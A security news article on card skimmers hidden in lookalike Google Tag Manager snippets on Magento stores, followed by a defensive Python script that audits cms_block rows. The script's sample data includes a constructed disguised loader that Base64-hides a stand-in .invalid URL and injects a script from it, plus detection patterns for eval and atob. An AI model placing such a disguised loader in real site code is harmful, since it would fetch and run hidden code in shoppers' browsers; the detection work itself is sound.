Cybersecurity experts have discovered that hackers are using Google Tag Manager (GTM) to secretly inject malicious scripts into e-commerce websites. These scripts, known as credit card skimmers, steal customers’ payment details when they enter them during checkout.
Attack Details
Researchers at Sucuri have observed threat actors leveraging GTM to install e-skimmer malware on Magento-based e-stores. Google Tag Manager (GTM) is a free tool that allows website owners to manage marketing tags without modifying site code, simplifying analytics and ad tracking. However, attackers exploit this feature to inject malicious scripts.
Sucuri inspected an affected website and found the malicious code hidden in the database (cms_block.content), disguised as a Google Tag Manager and Google Analytics script to evade detection. This technique enables hackers to bypass security measures and remain undetected.
Previous Incidents
This is not the first time GTM has been used for e-skimming. In 2024, Sucuri researchers detailed how Magecart veteran ATMZOW utilized Google Tag Manager to deliver malware. The latest report confirms that the tactic is still actively being used by cybercriminals.
At the time of publishing, three websites were found infected with the GTM identifier (GTM-MLHK2N68), down from six reported earlier by Sucuri.
How the Malware Works
Once embedded, the GTM tag contains an encoded JavaScript payload that acts as a credit card skimmer. The script captures sensitive payment data entered by users during checkout and transmits it to an attacker-controlled server. The malware also uses the _0x5cdc function to obfuscate code, mapping index values to characters and employing mathematical operations. Attackers further utilize Base64 encoding to disguise malicious scripts, making detection even harder.
Additionally, the script injects a modified Google Analytics script, which executes a hidden credit card skimmer to exfiltrate payment data to an external server.
Expert Insights
Security researchers warn that this GTM-based attack highlights the growing sophistication of modern malware. By leveraging legitimate platforms like Google Tag Manager, attackers can deploy harmful code while evading traditional security measures. The obfuscation and encoding techniques used in these attacks require deep investigation to uncover their true purpose.
How to Protect Against GTM-Based Attacks
- Monitor GTM Configurations: Regularly audit GTM settings and scripts for unauthorized changes.
- Use Security Tools: Implement advanced security solutions to detect unusual script behavior.
- Enable a Content Security Policy (CSP): Restrict which script sources the browser may execute, so an injected inline or third-party script is blocked rather than run.
- Perform Security Audits: Conduct frequent security checks to identify and mitigate vulnerabilities.
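The two indicators the report gives, a GTM/GA-lookalike snippet stored in Magento's cms_block.content and an inline payload built from hex-style identifiers with Base64-wrapped strings, can be turned into a routine audit of those database rows. The script below is an added example written for this article; it is not Sucuri's tooling or Magento's own code. It assumes a store whose only legitimate container is a placeholder id (GTM-EXAMPLE1), an allow-list of script hosts limited to Google's tag and analytics domains, and a handful of constructed cms_block rows (the hostnames under .invalid and the container GTM-ZZZZ999 are made up for the sample).

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Assumptions for this example: the store's real container id(s) and the hosts
# its tags are expected to load from. A real store will have a longer host list.
ALLOWED_GTM_CONTAINERS = {"GTM-EXAMPLE1"}          # placeholder, not a real id
ALLOWED_SCRIPT_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_ATTR_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.I)
GTM_ID_RE = re.compile(r"\bGTM-[A-Z0-9]{4,10}\b")
HEX_IDENT_RE = re.compile(r"\b_0x[0-9a-fA-F]{3,}\b")          # _0x5cdc-style names
DECODER_RE = re.compile(r"\b(?:atob|eval|unescape|String\.fromCharCode)\s*\(")
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")           # long Base64 runs


def decode_base64_blobs(text):
    """Yield Base64 runs found in `text` that decode to readable text."""
    for blob in BASE64_RE.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue                      # not valid Base64, ignore
        decoded = raw.decode("utf-8", errors="replace")
        if decoded.isprintable():
            yield decoded


def inspect_script(attrs, body):
    """Return a list of findings for one <script> element (attributes + inline body)."""
    findings = []
    for container in sorted(set(GTM_ID_RE.findall(body))):
        if container not in ALLOWED_GTM_CONTAINERS:
            findings.append(f"references GTM container {container} not on the allow-list")
    for src in SRC_ATTR_RE.findall(attrs):
        host = urlparse(src).hostname
        if host is not None and host not in ALLOWED_SCRIPT_HOSTS:
            findings.append(f"loads external script from {host}")
    if HEX_IDENT_RE.search(body):
        findings.append("hex-style obfuscated identifiers (_0x...) in inline script")
    if DECODER_RE.search(body):
        findings.append("runtime decoding/eval call in inline script")
    for decoded in decode_base64_blobs(body):
        if re.search(r"https?://|<script|document\.", decoded):
            findings.append(f"base64 blob decodes to script-like content: {decoded[:60]}")
    return findings


def audit_cms_blocks(rows):
    """rows: iterable of (identifier, content) as read from Magento's cms_block table.
    Returns {identifier: [finding, ...]} for every block with at least one finding."""
    report = {}
    for identifier, content in rows:
        findings = []
        for attrs, body in SCRIPT_RE.findall(content):
            findings.extend(inspect_script(attrs, body))
        if findings:
            report[identifier] = findings
    return report


# Constructed sample rows (not taken from any real store).
LEGIT_GTM = (
    "<!-- Google Tag Manager -->"
    "<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':"
    "new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],"
    "j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src="
    "'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);"
    "})(window,document,'script','dataLayer','GTM-EXAMPLE1');</script>"
)
# A lookalike block: GTM comment header, unknown container id, hex-style names,
# and a loader URL hidden in Base64 (pointing at a reserved .invalid host).
FAKE_URL_B64 = base64.b64encode(b"https://example.invalid/collect.js").decode()
DISGUISED = (
    "<!-- Google Tag Manager -->"
    "<script>window.dataLayer=window.dataLayer||[];"
    "window.dataLayer.push({'gtm.container':'GTM-ZZZZ999'});"
    "var _0x1a2b=['createElement','src','appendChild'];"
    "(function(d){var s=d[_0x1a2b[0]]('script');s[_0x1a2b[1]]=atob('" + FAKE_URL_B64 + "');"
    "d.head[_0x1a2b[2]](s)})(document);</script>"
)
SAMPLE_CMS_BLOCKS = [
    ("footer_links", "<ul><li><a href='/contact'>Contact</a></li></ul>"),
    ("gtm_header", LEGIT_GTM),
    ("promo_banner", DISGUISED),
    ("analytics_loader", "<script src=\"https://cdn.example.invalid/ga.js\"></script>"),
]

if __name__ == "__main__":
    for block, findings in audit_cms_blocks(SAMPLE_CMS_BLOCKS).items():
        print(block)
        for finding in findings:
            print("  -", finding)
```

In practice the rows come from `SELECT identifier, content FROM cms_block` (and the same check is worth running over cms_page.content and the design/head configuration), with the host and container allow-lists taken from the store's known tag setup; anything the audit flags is then compared against the live GTM container configuration, since a block that looks like the official snippet but carries a different container id is exactly the disguise the report describes.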
Conclusion
Cybercriminals continue to refine their methods, using trusted tools like Google Tag Manager to steal financial data. Online businesses must remain vigilant, update their security protocols, and educate customers on safe online shopping practices.